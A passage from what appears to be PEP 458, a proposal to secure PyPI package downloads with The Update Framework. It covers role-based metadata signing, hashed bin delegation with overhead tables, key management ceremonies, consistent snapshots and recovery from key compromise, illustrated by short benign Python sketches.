In addition, all target files SHOULD be available on disk at least twice: once under their original filename, to provide backwards compatibility, and once with their SHA-512 hash included in their filename. This is required to produce Consistent Snapshots.

+

Depending on the file system used, different data deduplication mechanisms MAY be employed to avoid the storage increase from hard copies of target files.

+
+
+
+

PyPI and TUF Metadata

+

TUF metadata provides information that clients can use to make update decisions. For example, targets metadata lists the available target files on PyPI and includes the required signatures, cryptographic hashes, and file sizes for each. Different metadata files provide different information and are signed by separate roles. The root role indicates what metadata belongs to each role. The concept of roles allows TUF to delegate responsibilities to multiple roles, thus minimizing the impact of any one compromised role.

+

TUF requires four top-level roles. These are root, timestamp, snapshot, +and targets. The root role specifies the public cryptographic keys of the +top-level roles (including its own). The timestamp role references the +latest snapshot and can signify when a new snapshot of the repository is +available. The snapshot role indicates the latest version of all the TUF +metadata files (other than timestamp). The targets role lists the file +paths of available target files together with their cryptographic hashes. +The file paths must be specified relative to a base URL. This allows the +actual target files to be served from anywhere, as long as the base URL +can be accessed by the client. Each top-level role will serve its +responsibilities without exception. Table 1 provides an overview of the +roles used in TUF.

+ + + + + + + + + + + + + + + + + + + + +
Roles and Responsibilities

root | The root role is the locus of trust for the entire repository. The root role signs the root.json metadata file. This file indicates which keys are authorized for each of the top-level roles, including for the root role itself. The roles “root”, “snapshot”, “timestamp” and “targets” must be specified and each has a list of public keys.

targets | The targets role is responsible for indicating which target files are available from the repository. More precisely, it shares the responsibility of providing information about the content of updates. The targets role signs targets.json metadata, and can delegate trust for repository files to other roles (delegated roles).

delegated roles | If the top-level targets role performs delegation, the resulting delegated roles can then provide their own metadata files. The format of the metadata files provided by delegated targets roles is the same as that of targets.json. As with targets.json, the latest version of metadata files belonging to delegated roles are described in the snapshot role’s metadata.

snapshot | The snapshot role is responsible for ensuring that clients see a consistent repository state. It provides repository state information by indicating the latest versions of the top-level targets and delegated targets metadata files on the repository in snapshot.json. root and timestamp are not listed in snapshot.json, because timestamp signs for its freshness, after snapshot.json has been created, and root, which has all top-level keys, is required ahead of time to trust any of the top-level roles.

timestamp | The timestamp role is responsible for providing information about the timeliness of available updates. Timeliness information is made available by frequently signing a new timestamp.json file that has a short expiration time. This file indicates the latest version of snapshot.json.
+

Table 1: An overview of the TUF roles.

+

Unless otherwise specified, this PEP RECOMMENDS that every metadata or +target file be hashed using the SHA2-512 function of +the SHA-2 family. SHA-2 has native and well-tested Python 2 and 3 +support (allowing for verification of these hashes without additional, +non-Python dependencies). If stronger security guarantees are +required, then both SHA2-256 and SHA2-512 or both SHA2-256 and SHA3-256 +MAY be used instead. SHA2-256 and SHA3-256 +are based on very different designs from each other, providing extra protection +against collision attacks. However, SHA-3 +requires installing additional, non-Python dependencies for Python 2.

+
+

Signing Metadata and Repository Management

+

The top-level root role signs for the keys of the top-level timestamp, +snapshot, targets, and root roles. The timestamp role signs for every +new snapshot of the repository metadata. The snapshot role signs for root, +targets, and all delegated targets roles. The delegated targets role bins +further delegates to the bin-n roles, which sign for all distribution files +belonging to registered PyPI projects.

+

Figure 1 provides an overview of the roles available within PyPI, which +includes the top-level roles and the roles delegated to by targets. The figure +also indicates the types of keys used to sign each role, and which roles are +trusted to sign for files available on PyPI. The next two sections cover the +details of signing repository files and the types of keys used for each role.

+../_images/pep-0458-1.png +

Figure 1: An overview of the role metadata available on PyPI.

+

The roles that change most frequently are timestamp, snapshot and roles +delegated to by bins (i.e., bin-n). The timestamp and snapshot +metadata MUST be updated whenever root, targets or delegated metadata are +updated. Observe, though, that root and targets metadata are much less +likely to be updated as often as delegated metadata. Similarly, the bins role +will only be updated when a bin-n role is added, updated, or removed. Therefore, timestamp, +snapshot, and bin-n metadata will most likely be updated frequently (possibly every +minute) due to delegated metadata being updated frequently in order to support +continuous delivery of projects. Continuous delivery is a set of processes +that PyPI uses to produce snapshots that can safely coexist and be deleted +independent of other snapshots [18].

+

Every year, PyPI administrators SHOULD sign for root and targets role keys. +Automation will continuously sign for a timestamped snapshot of all projects. A +repository Metadata API is available that can be used to manage a TUF +repository.

+

In standard operation, the bin-n metadata will be updated and signed as new +distributions are uploaded to PyPI. However, there will also need to be a +one-time online initialization mechanism to create and sign bin-n metadata for +all existing distributions that are part of the PyPI repository every time PyPI +is re-initialized.

+
+
+

How to Establish Initial Trust in the PyPI Root Keys

+

Package managers like pip MUST ship the root metadata file with the installation files that users initially download. This includes information about the keys trusted for all top-level roles (including the root keys themselves). Package managers must also bundle a TUF client library. Any new version of root metadata that the TUF client library may download is verified against the root keys initially bundled with the package manager. If a root key is compromised, but a threshold of keys are still secured, then PyPI administrators MUST push new root metadata that revokes trust in the compromised keys. If a threshold of root keys are compromised, then the root metadata MUST be updated out-of-band. (However, the threshold of root keys should be chosen so that this event is extremely unlikely.) Package managers do not necessarily need to be updated immediately if root keys are revoked or added between new releases of the package manager, as the TUF update process automatically handles cases where a threshold of previous root keys sign for new root keys (assuming no backwards-incompatibility in the TUF specification used). So, for example, if a package manager was initially shipped with version 1 of the root metadata, and a threshold of root keys in version 1 signed version 2 of the root metadata, and a threshold of root keys in version 2 signed version 3 of the root metadata, then the package manager should be able to transparently update its copy of the root metadata from version 1 to 3 using its TUF client library.

+

Thus, to repeat, the latest good copy of root metadata and a TUF client library MUST +be included in any new version of pip shipped with CPython (via ensurepip). The TUF +client library inside the package manager then loads the root metadata and downloads +the rest of the roles, including updating the root metadata if it has changed. +An outline of the update process is available.

+
+
+

Minimum Security Model

+

There are two security models to consider when integrating TUF into PyPI. The +one proposed in this PEP is the minimum security model, which supports +verification of PyPI distributions signed with private cryptographic +keys stored on PyPI. Distributions uploaded by developers are signed by PyPI +and immediately available for download. A possible future extension to this +PEP, discussed in PEP 480, proposes the maximum security model and allows +a developer to sign for their project. Developer keys are not stored online: +therefore, projects are safe from PyPI compromises.

+

The minimum security model requires no action from a developer and protects +against malicious CDNs [19] and public mirrors. To support continuous +delivery of uploaded distributions, PyPI signs for projects with an online key. +This level of security prevents projects from being accidentally or +deliberately tampered with by a mirror or a CDN because neither will +have any of the keys required to sign for projects. However, it does not +protect projects from attackers who have compromised PyPI, since they can +then manipulate TUF metadata using the keys stored online.

+

This PEP proposes that the bin-n roles sign for all PyPI projects with online +keys. These bin-n roles MUST all be delegated by the upper-level bins role, +which is signed with an offline key, and in turn MUST be delegated by the +top-level targets role, which is also signed with an offline key. +This means that when a package manager such as pip (i.e., using TUF) downloads +a distribution file from a project on PyPI, it will consult the targets role about +the TUF metadata for that distribution file. If ultimately no bin-n roles +delegated by targets via bins specify the distribution file, then it is +considered to be non-existent on PyPI.

+

Note, the reason why targets does not directly delegate to bin-n, but +instead uses the intermediary bins role, is so that other delegations can +easily be added or removed, without affecting the bins-to-bin-n mapping. +This is crucial for the implementation of PEP 480.

+
+
+

Metadata Expiry Times

+

The metadata for the root, targets, and bins roles SHOULD each expire in +one year, because these metadata files are expected to change very rarely.

+

The timestamp, snapshot, and bin-n metadata SHOULD each expire in one day +because a CDN or mirror SHOULD synchronize itself with PyPI every day. +Furthermore, this generous time frame also takes into account client clocks +that are highly skewed or adrift.

+
+
+

Metadata Scalability

+

As the number of projects and distributions on a repository grows, TUF metadata will need to +grow correspondingly. For example, consider the bins role. In August 2013, +it was found that the size of the bins metadata was about 42MB if the bins +role itself signed for about 220K PyPI targets (which are simple indices and +distributions). This PEP does not delve into the details, but TUF features a +so-called “hashed bin delegation” scheme that splits a large targets metadata file +into many small ones. This allows a TUF client updater to intelligently +download only a small number of TUF metadata files in order to update any +project signed for by the bins role. For example, applying this scheme to +the previous repository resulted in pip downloading between 1.3KB and 111KB to +install or upgrade a PyPI project via TUF.

+

Based on our findings as of the time this document was updated for +implementation (Nov 7 2019), summarized in Tables 2-3, PyPI SHOULD +split all targets in the bins role by delegating them to 16,384 +bin-n roles (see C10 in Table 2). Each bin-n role would sign +for the PyPI targets whose SHA2-512 hashes fall into that bin +(see Figure 1 and Consistent Snapshots). It was found +that this number of bins would result in a 5-9% metadata overhead +(relative to the average size of downloaded distribution files; see V13 and +V15 in Table 3) for returning users, and a 69% overhead for new +users who are installing pip for the first time (see V17 in Table 3).
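The general shape of hashed bin delegation, as a sketch (the authoritative path-to-bin mapping is defined by the TUF reference implementation; bin_for_target is a hypothetical helper):

import hashlib
import math

NUM_BINS = 16_384                                # C10 in Table 2
PREFIX_LEN = math.ceil(math.log(NUM_BINS, 16))   # V1: 4 hex digits
PREFIXES_PER_BIN = 16 ** PREFIX_LEN // NUM_BINS  # 65,536 / 16,384 = 4

def bin_for_target(path: str) -> int:
    # A target is assigned to a bin by the leading hex digits of the
    # SHA2-512 hash of its file path.
    prefix = int(hashlib.sha512(path.encode("utf-8")).hexdigest()[:PREFIX_LEN], 16)
    return prefix // PREFIXES_PER_BIN            # an int in range(NUM_BINS)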

+

A few assumptions used in calculating these metadata overhead percentages:

+
    +
  1. We are ignoring root, timestamp, and top-level targets metadata.
  2. pip will always be bundled with the latest good copy of metadata for all roles.
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Name | Description | Value
C1 | # of bytes in a SHA2-512 hexadecimal digest | 128
C2 | # of bytes for a SHA2-512 public key ID | 64
C3 | # of bytes for an Ed25519 signature | 128
C4 | # of bytes for an Ed25519 public key | 64
C5 | # of bytes for a target relative file path | 256
C6 | # of bytes to encode a target file size | 7
C7 | # of bytes to encode a version number | 6
C8 | # of targets (simple indices and distributions) | 2,273,539
C9 | Average # of bytes for a downloaded distribution | 2,184,393
C10 | # of bins | 16,384
+

C8 was computed by querying the number of release files. C9 was derived by taking the average between a rough estimate of the average size of release files downloaded over the past 31 days (1,628,321 bytes), and the average size of release files on disk (2,740,465 bytes). Ee Durbin helped to provide these numbers on November 7, 2019.

+

Table 2: A list of constants used to calculate metadata overhead.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Name | Description | Formula | Value
V1 | Length of a path hash prefix | math.ceil(math.log(C10, 16)) | 4
V2 | Total # of path hash prefixes | 16**V1 | 65,536
V3 | Avg # of targets per bin | math.ceil(C8/C10) | 139
V4 | Avg size of SHA-512 hashes per bin | V3*C1 | 17,792
V5 | Avg size of target paths per bin | V3*C5 | 35,584
V6 | Avg size of lengths per bin | V3*C6 | 973
V7 | Avg size of bin-n metadata (bytes) | V4+V5+V6 | 54,349
V8 | Total size of public key IDs in bins | C10*C2 | 1,048,576
V9 | Total size of path hash prefixes in bins | V1*V2 | 262,144
V10 | Est. size of bins metadata (bytes) | V8+V9 | 1,310,720
V11 | Est. size of snapshot metadata (bytes) | C10*C7 | 98,304
V12 | Est. size of metadata overhead per distribution per returning user (same snapshot) | 2*V7 | 108,698
V13 | Est. metadata overhead per distribution per returning user (same snapshot) | round((V12/C9)*100) | 5%
V14 | Est. size of metadata overhead per distribution per returning user (diff snapshot) | V12+V11 | 207,002
V15 | Est. metadata overhead per distribution per returning user (diff snapshot) | round((V14/C9)*100) | 9%
V16 | Est. size of metadata overhead per distribution per new user | V14+V10 | 1,517,722
V17 | Est. metadata overhead per distribution per new user | round((V16/C9)*100) | 69%
+

Table 3: Estimated metadata overheads for new and returning users.
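The tabulated values are easy to re-derive; a short Python transcription of the formulas in Tables 2-3:

import math

C1, C2, C5, C6, C7 = 128, 64, 256, 7, 6       # sizes from Table 2
C8, C9, C10 = 2_273_539, 2_184_393, 16_384    # targets, avg. distribution size, bins

V1 = math.ceil(math.log(C10, 16))             # 4
V2 = 16 ** V1                                 # 65,536
V3 = math.ceil(C8 / C10)                      # 139
V7 = V3 * C1 + V3 * C5 + V3 * C6              # V4 + V5 + V6 = 54,349
V10 = C10 * C2 + V1 * V2                      # V8 + V9 = 1,310,720
V11 = C10 * C7                                # 98,304
V12 = 2 * V7                                  # 108,698
V14 = V12 + V11                               # 207,002
V16 = V14 + V10                               # 1,517,722

for name, size in (("V13", V12), ("V15", V14), ("V17", V16)):
    print(name, f"{round(size / C9 * 100)}%")  # 5%, 9%, 69%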

+

The interested reader may find an interactive version of the metadata overhead +calculator here:

+

This number of bins SHOULD increase when the metadata overhead for returning users exceeds 50%. Presently, this SHOULD happen when the number of targets increases at least 10x from over 2M to over 22M, at which point the metadata overhead for returning and new users would be around 50-54% and 114% respectively, assuming that the number of bins stays fixed. If the number of bins is increased, then the cost for all users would effectively be the cost for new users, because their cost would be dominated by the (once-in-a-while) cost of downloading the large number of delegations in the bins metadata. If the cost for new users should prove to be too much, primarily due to the overhead of downloading the bins metadata, then this subject SHOULD be revisited before that happens.

+

Note that changes to the number of bins on the server are transparent to the +client. The package manager will be required to download a fresh set of +metadata, as though it were a new user, but this operation will not require any +explicit code logic or user interaction in order to do so.

+

It is possible to make TUF metadata more compact by representing it in a binary +format, as opposed to the JSON text format. Nevertheless, a sufficiently large +number of projects and distributions will introduce scalability challenges at +some point, and therefore the bins role will still need delegations (as +outlined in Figure 1) in order to address the problem. The JSON format is an +open and well-known standard for data interchange, which is already supported by +the TUF reference implementation, and therefore the recommended data format by +this PEP. However, due to the large number of delegations, compressed +versions of all metadata SHOULD also be made available to clients via the +existing Warehouse mechanisms for HTTP compression. In addition, the JSON +metadata could be compressed before being sent to clients. The TUF reference +implementation does not currently support downloading compressed JSON metadata, +but this could be added to reduce the metadata size.

+
+
+
+

PyPI and Key Requirements

+

In this section, the kinds of keys required to sign for TUF roles on PyPI are +examined. TUF is agnostic with respect to choices of digital signature +algorithms. However, this PEP RECOMMENDS that all digital signatures be +produced with the Ed25519 algorithm [15]. Ed25519 has native and +well-tested Python support (allowing for verification of signatures without +additional, non-Python dependencies), uses small keys, and is supported +by modern HSM and authentication token hardware.

+ +
+

Managing online keys

+

The online key shared by the timestamp, snapshot, and all bin-n roles +MAY be stored, encrypted or not, on the Python infrastructure. For example, +the key MAY be kept on a self-hosted key management service (e.g. Hashicorp +Vault), or a third-party one (e.g. AWS KMS, Google Cloud KMS, or Azure +Key Vault).

+

Some of these key management services allow keys to be stored on Hardware +Security Modules (HSMs) (e.g., Hashicorp Vault, AWS CloudHSM, Google +Cloud HSM, Azure Key Vault). This prevents attackers from exfiltrating +the online private key (albeit not from using it, although their actions +may now be cryptographically auditable). However, this requires modifying +the reference TUF implementation to support HSMs (WIP).

+

Regardless of where and how this online key is kept, its use SHOULD be +carefully logged, monitored, and audited, ideally in such a manner that +attackers who compromise PyPI are unable to immediately turn off this logging, +monitoring, and auditing.

+
+
+

Managing offline keys

+

As explained in the previous section, the root, targets, and bins role +keys MUST be offline for maximum security. These keys will be offline in the +sense that their private keys MUST NOT be stored on PyPI, though some of them +MAY be online in the private infrastructure of the project.

+

There SHOULD be an offline key ceremony to generate, backup, and store these +keys in such a manner that the private keys can be read only by the Python +administrators when necessary (e.g., such as rotating the keys for the +top-level TUF roles). Thus, keys SHOULD be generated, preferably in a physical +location where side-channel attacks are not a concern, using:

+
    +
  1. A trusted, airgapped computer with a true random number generator, and with no data persisting after the ceremony
  2. A trusted operating system
  3. A trusted set of third-party packages (such as updated versions of cryptographic libraries or the TUF reference implementation, where the versions provided by the trusted operating system are not recent enough)
+

In order to avoid the persistence of sensitive data (e.g., private keys) other than +on backup media after the ceremony, offline keys SHOULD be generated +encrypted using strong passwords, either on (in decreasing order of trust): +private HSMs (e.g., YubiHSM), cloud-based HSMs (e.g., those listed above), +in volatile memory (e.g., RAM), or in nonvolatile memory +(e.g., SSD or microSD). If keys must be generated on nonvolatile memory, +then this memory MUST be irrecoverably destroyed after having securely +backed up the keys.

+

Passwords used to encrypt keys SHOULD be stored somewhere durable and +trustworthy to which only Python admins have access.

+

In order to minimize OPSEC errors during the ceremony, scripts SHOULD be +written, for execution on the trusted key-generation computer, to automate +tedious steps of the ceremony, such as:

+
    +
  • Exporting to sneakernet all code and data (previous TUF metadata and root +keys) required to generate new keys and replace old ones
  • +
  • Tightening the firewall, updating the entire operating system in order to +fix security vulnerabilities, and airgapping the computer
  • +
  • Exporting all new TUF metadata and keys to encrypted backup media. +This backup provides a complete copy of the data required to restore the PyPI +TUF repository
  • +
  • Exporting only new TUF metadata and online keys to encrypted backup media. +This backup provides all online data for import into the PyPI infrastructure +and is useful, e.g., when the online data needs to be restored from a previous +archived state
  • +
  • Printing and saving cryptographic hashes of new TUF metadata. This printed copy +provides an additional offline paper backup, which can be used as a comparison +in the case of a compromise
  • +
+

Note that the one-time keys for the targets and bins roles MAY be safely generated, used, and deleted during the offline key ceremony. Furthermore, the root keys need not be generated during the offline key ceremony itself. Instead, a threshold t of n Python administrators, as discussed above, MAY independently sign the root metadata after the offline key ceremony used to generate all other keys.

+
+
+
+

How Should Metadata be Generated?

+

Project developers expect the distributions they upload to PyPI to be +immediately available for download. Unfortunately, there will be problems when +many readers and writers simultaneously access the same metadata and +target files. That is, there needs to be a way to ensure consistency of +metadata and target files when multiple developers simultaneously change these +files. There are also issues with consistency on PyPI +without TUF, but the problem is more severe with signed metadata that MUST keep +track of the files available on PyPI in real-time.

+

Suppose that PyPI generates a snapshot that indicates the latest version of +every metadata, except timestamp, at version 1 and a client requests this +snapshot from PyPI. While the client is busy downloading this snapshot, +PyPI then timestamps a new snapshot at, say, version 2. Without ensuring +consistency of metadata, the client would find itself with a copy of snapshot +that disagrees with what is available on PyPI. The result would be indistinguishable from +arbitrary metadata injected by an attacker. The problem would also occur with +mirrors attempting to sync with PyPI.

+
+

Consistent Snapshots

+

To keep TUF metadata on PyPI consistent with the highly volatile target files, +consistent snapshots SHOULD be used. Each consistent snapshot captures the +state of all known projects at a given time and MAY safely coexist with any +other snapshot, or be deleted independently, without affecting any other +snapshot.

+

To maintain consistent snapshots, all TUF metadata MUST, when written to disk, +include a version number in their filename:

+
+
+
VERSION_NUMBER.ROLENAME.json,
where VERSION_NUMBER is an incrementing integer, and ROLENAME is one of the +top-level metadata roles – root, snapshot or targets – or one of +the delegated targets roles – bins or bin-n.
+
+
+

The only exception is the timestamp metadata file, whose version would not be known +in advance when a client performs an update. The timestamp metadata +lists the +version of the snapshot metadata, which in turn lists the versions of the +targets and delegated targets metadata, all as part of a given consistent +snapshot.

+

In normal usage, version number overflow is unlikely to occur. An 8-byte integer, +for instance, can be incremented once per millisecond and last almost 300 million +years. If an attacker increases the version number arbitrarily, the repository +can recover by revoking the compromised keys and resetting the version number as +described in the TUF specification.
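The arithmetic behind the “almost 300 million years” figure, assuming a signed 64-bit counter incremented once per millisecond:

ms_per_year = 1000 * 60 * 60 * 24 * 365.25
print((2 ** 63 - 1) / ms_per_year)  # ~2.9e8 years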

+

The targets or delegated targets metadata refer to the actual target +files, including their cryptographic hashes as specified above. +Thus, to mark a target file as part of a consistent snapshot it MUST, when +written to disk, include its hash in its filename:

+
+
+
HASH.FILENAME
where HASH is the hex digest of the hash of the file contents and +FILENAME is the original filename.
+
+
+

This means that there MAY be multiple copies of every target file, one for each +of the cryptographic hash functions specified above.
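Both naming conventions are simple to produce; a sketch using the SHA2-512 function recommended above (the helper names are hypothetical):

import hashlib
from pathlib import Path

def consistent_target_name(target: Path) -> str:
    # HASH.FILENAME for a target file.
    digest = hashlib.sha512(target.read_bytes()).hexdigest()
    return f"{digest}.{target.name}"

def consistent_metadata_name(version: int, rolename: str) -> str:
    # VERSION_NUMBER.ROLENAME.json for a metadata file.
    return f"{version}.{rolename}.json"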

+

Assuming infinite disk space, strictly incrementing version numbers, and no +hash collisions, a client may safely read from one snapshot while PyPI +produces another snapshot.

+

Clients, such as pip, that use the TUF protocol MUST be modified to download +every metadata and target file, except for timestamp metadata. This is done +by including, in the file request, the version of the file (for metadata), +or the cryptographic hash of the file (for target files) in the filename.

+

In this simple but effective manner, PyPI is able to capture a consistent +snapshot of all projects and the associated metadata at a given time. The next +subsection provides implementation details of this idea.

+

Note: This PEP does not prohibit using advanced file systems or tools to +produce consistent snapshots. There are two important reasons for proposing a simple solution in this PEP. +First, the solution does not mandate that PyPI +use any particular file system or tool. Second, the generic file-system based +approach allows mirrors to use extant file transfer tools, such as rsync, to +efficiently transfer consistent snapshots from PyPI.

+
+
+

Producing Consistent Snapshots

+

When a new distribution file is uploaded to PyPI, PyPI MUST update the +responsible bin-n metadata. Remember that all target files are sorted into +bins by their filename hashes. PyPI MUST also update snapshot to account for +the updated bin-n metadata, and timestamp to account for the updated +snapshot metadata. These updates SHOULD be handled by an automated snapshot +process.

+

File uploads MAY be handled in parallel; however, consistent snapshots MUST be
produced in a strictly sequential manner. Furthermore, as long as distribution
files are self-contained, a consistent snapshot MAY be produced for each
uploaded file. To do so, upload processes place new distribution files into a
concurrency-safe FIFO queue, and the snapshot process reads from that queue one
file at a time and performs the following tasks:

+

First, it adds the new file path to the relevant bin-n metadata, increments +its version number, signs it with the bin-n role key, and writes it to +VERSION_NUMBER.bin-N.json.

+

Then, it takes the most recent snapshot metadata, updates its bin-n +metadata version numbers, increments its own version number, signs it with the +snapshot role key, and writes it to VERSION_NUMBER.snapshot.json.

+

And finally, the snapshot process takes the most recent timestamp metadata, +updates its snapshot metadata hash and version number, increments its own +version number, sets a new expiration time, signs it with the timestamp role +key, and writes it to timestamp.json.
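The following sketch condenses these three tasks into code. The sign() and
write() helpers and the dict-based role objects are placeholders invented for
this example, and the sketch omits details such as including the snapshot
metadata hash in timestamp:

import json
import queue

upload_queue = queue.Queue()  # filled by the (possibly parallel) upload processes

def sign(role, key_name):
    # Placeholder: a real implementation signs the role metadata with the
    # named role key and attaches the signature(s).
    return {"signed": role, "signatures": ["<signed with %s>" % key_name]}

def write(metadata, filename):
    # Placeholder: a real implementation writes atomically into the repository.
    print(filename, json.dumps(metadata))

def snapshot_process(bin_n, snapshot, timestamp):
    while True:
        path = upload_queue.get()  # one distribution file at a time
        # 1. Add the new file path to the relevant bin-n metadata.
        bin_n["targets"].append(path)
        bin_n["version"] += 1
        write(sign(bin_n, "bin-n key"),
              "%d.%s.json" % (bin_n["version"], bin_n["name"]))
        # 2. Record the new bin-n version in snapshot.
        snapshot["meta"][bin_n["name"]] = bin_n["version"]
        snapshot["version"] += 1
        write(sign(snapshot, "snapshot key"),
              "%d.snapshot.json" % snapshot["version"])
        # 3. Record the new snapshot version in timestamp and renew its expiry.
        timestamp["snapshot_version"] = snapshot["version"]
        timestamp["version"] += 1
        timestamp["expires"] = "<new expiration time>"
        write(sign(timestamp, "timestamp key"), "timestamp.json")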

+

When updating bin-n metadata for a consistent snapshot, the snapshot process
SHOULD also include any new or updated hashes of simple index pages in the
relevant bin-n metadata. Note that simple index pages may be generated
dynamically on API calls, so it is important that their output remain stable
throughout the validity of a consistent snapshot.

+

Since the snapshot process MUST generate consistent snapshots in a strictly
sequential manner, it constitutes a bottleneck. Fortunately, the signing
operation is fast enough that this may be done a thousand or more times per
second.

+

Moreover, PyPI MAY serve distribution files to clients before the corresponding +consistent snapshot metadata is generated. In that case the client software +SHOULD inform the user that full TUF protection is not yet available but will +be shortly.

+

PyPI SHOULD use a transaction log to record upload processes and the +snapshot queue for auditing and to recover from errors after a server failure.

+
+
+

Cleaning up old metadata

+

To avoid running out of disk space due to the constant production of new +consistent snapshots, PyPI SHOULD regularly delete old consistent snapshots, +i.e. metadata and target files that were obsoleted some reasonable time in +the past, such as 1 hour.

+

In order to preserve the latest consistent snapshot, PyPI MAY use a
“mark-and-sweep” algorithm: walk from the root of the latest consistent
snapshot, i.e. from timestamp through snapshot to the targets and
delegated targets metadata and down to the target files, marking all visited
files, and then delete all unmarked files. The last few consistent snapshots
may be preserved in a similar fashion.
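A minimal sketch of such a cleanup pass, assuming a hypothetical reachable()
helper that walks the metadata graph:

import os

def reachable(timestamp_metadata):
    # Placeholder: a real implementation walks timestamp -> snapshot ->
    # (delegated) targets metadata and yields every referenced file path.
    return []

def sweep(repository_root, recent_timestamps):
    marked = set()
    for timestamp in recent_timestamps:  # the consistent snapshots to keep
        marked.update(reachable(timestamp))  # mark phase
    for dirpath, _dirnames, filenames in os.walk(repository_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.endswith(".root.json"):
                continue  # old root metadata MUST NOT be deleted (see below)
            if path not in marked:
                os.remove(path)  # sweep phase: delete unmarked files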

+

Deleting a consistent snapshot will cause clients to see nothing except HTTP +404 responses to any request for a file within that consistent snapshot. +Clients SHOULD then retry their requests (as before) with the latest consistent +snapshot.

+

Note that root metadata, even though versioned, is not part of any consistent +snapshot. PyPI MUST NOT delete old versions of root metadata. This guarantees +that clients can update to the latest root role keys, no matter how outdated +their local root metadata is.

+
+
+
+

Revoking Trust in Projects and Distributions

+

From time to time, either a project or a distribution will need to be revoked.
To revoke trust in either a project or a distribution, the associated bin-n
role can simply remove the corresponding targets and re-sign the bin-n
metadata. This requires only the online bin-n key.

+
+
+

Key Compromise Analysis

+

This PEP has covered the minimum security model, the TUF roles that should be +added to support continuous delivery of distributions, and how to generate and +sign the metadata for each role. The remaining sections discuss how PyPI +SHOULD audit repository metadata, and the methods PyPI can use to detect and +recover from a PyPI compromise.

+

Table 4 summarizes a few of the attacks possible when a threshold number of +private cryptographic keys (belonging to any of the PyPI roles) are +compromised. The leftmost column lists the roles (or a combination of roles) +that have been compromised, and the columns to its right show whether the +compromised roles leave clients susceptible to malicious updates, a freeze +attack, or metadata inconsistency attacks. Note that if the timestamp, snapshot, +and bin-n roles are stored in the same online location, a compromise of one +means they will all be compromised. Therefore, the table considers these +roles together. A version of this table that considers these roles separately +is included in PEP 480.

Role Compromise                     Malicious Updates / Freeze Attack / Metadata Inconsistency Attacks
targets OR bins                     NO (timestamp and snapshot need to cooperate)
timestamp AND snapshot AND bin-n    YES (limited by earliest root, targets, or bins metadata expiry time)
root                                YES
+

Table 4: Attacks possible by compromising certain combinations of role keys. +In September 2013, it was shown how the latest version (at the time) of pip +was susceptible to these attacks and how TUF could protect users against them +[14].

+

Note that compromising targets or bins +does not immediately allow an attacker to serve malicious +updates. The attacker must also compromise the timestamp and snapshot +roles, which are both online and therefore more likely to be compromised. +This means that, in order to launch any attack, one must not only be able to +act as a man-in-the-middle, but also compromise the timestamp key (or +compromise the root keys and sign a new timestamp key). To launch any +attack other than a freeze attack, one must also compromise the snapshot key. +In practice, this PEP recommends storing the snapshot, timestamp, and +bin-n keys together, or even using the same key for all of these roles. +Because of this, the attacker only needs to compromise this single server to +perform any of the attacks listed above. Note that clients are still protected +against compromises of non-signing infrastructure such as CDNs or mirrors. +Moreover, the offline root key will +allow the repository to recover from an attack by revoking the online key(s).

+

The maximum security model shows how TUF mitigates online key compromises by
introducing additional roles for end-to-end signing. Details about how to
generate developer keys and sign uploaded distributions are provided in PEP 480.

+
+

In the Event of a Key Compromise

+

A key compromise means that a threshold of keys belonging to the metadata
roles on PyPI, as well as the PyPI infrastructure, have been compromised and
used to sign new metadata on PyPI.

+

If a threshold number of timestamp, snapshot, targets, bins or bin-n +keys have been compromised, then PyPI MUST take the following steps:

+
    +
  1. Revoke the timestamp, snapshot and targets role keys from
the root role. This is done by replacing the compromised timestamp,
snapshot and targets keys with newly issued keys.
  2. Revoke the bins keys from the targets role by replacing their keys with
newly issued keys. Sign the new targets role metadata and discard the new
keys (because, as explained earlier, this increases the security of
targets metadata).
  3. All targets of the bin-n roles SHOULD be compared with the last known
good consistent snapshot in which none of the timestamp, snapshot,
bins or bin-n keys were known to have been compromised. Added, updated or
deleted targets in the compromised consistent snapshot that do not match the
last known good consistent snapshot MAY be restored to their previous
versions. After ensuring the integrity of all bin-n targets, their keys
should be renewed in the bins metadata.
  4. The bins and bin-n metadata MUST have their version numbers incremented,
expiry times suitably extended, and signatures renewed.
  5. A new timestamped consistent snapshot MUST be issued.
+

Following these steps would preemptively protect all of these roles, even if +only one of them may have been compromised.

+

If a threshold number of root keys have been compromised, then PyPI MUST take +the above steps and also replace all root keys in the root role.

+

It is also RECOMMENDED that PyPI sufficiently document compromises with +security bulletins. These security bulletins will be most informative when +users of pip-with-TUF are unable to install or update a project because the +keys for the timestamp, snapshot or root roles are no longer valid. They +could then visit the PyPI web site to consult security bulletins that would +help to explain why they are no longer able to install or update, and then take +action accordingly. When a threshold number of root keys have not been +revoked due to a compromise, then new root metadata may be safely updated +because a threshold number of existing root keys will be used to sign for the +integrity of the new root metadata. TUF clients will be able to verify the +integrity of the new root metadata with a threshold number of previously +known root keys. This will be the common case. Otherwise, in the worst +case, in which a threshold number of root keys have been revoked due to a +compromise, an end-user may choose to update new root metadata with +out-of-band mechanisms.

+
+
+

Auditing Snapshots

+

If a malicious party compromises PyPI, they can sign arbitrary files with any +of the online keys. The roles with offline keys (i.e., root, targets and bins) +are still protected. To safely recover from a repository compromise, snapshots +should be audited to ensure files are only restored to trusted versions.

+

When a repository compromise has been detected, the integrity of three types of +information must be validated:

+
    +
  1. If the online keys of the repository have been compromised, they can be
revoked by having the targets role sign new metadata delegating to a new
key.
  2. If the role metadata on the repository has been changed, this would impact
the metadata that is signed by online keys. Any role information created
since the last period should be discarded. As a result, developers of new
projects will need to re-register their projects.
  3. If the target files themselves may have been tampered with, they can be
validated using the stored hash information for target files that existed
at the time of the last period.
+

In order to safely restore snapshots in the event of a compromise, PyPI SHOULD +maintain a small number of its own mirrors to copy PyPI snapshots according to +some schedule. The mirroring protocol can be used immediately for this +purpose. The mirrors must be secured and isolated such that they are +responsible only for mirroring PyPI. The mirrors can be checked against one +another to detect accidental or malicious failures.

+

Another approach is to generate the cryptographic hash of snapshot +periodically and tweet it. Perhaps a user comes forward with the actual +metadata and the repository maintainers can verify the metadata file’s cryptographic +hash. Alternatively, PyPI may periodically archive its own versions of +snapshot rather than rely on externally provided metadata. In this case, +PyPI SHOULD take the cryptographic hash of every target file on the +repository and store this data on an offline device. If any target file +hash has changed, this indicates an attack.
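A minimal sketch of that offline comparison (the helper names are assumptions;
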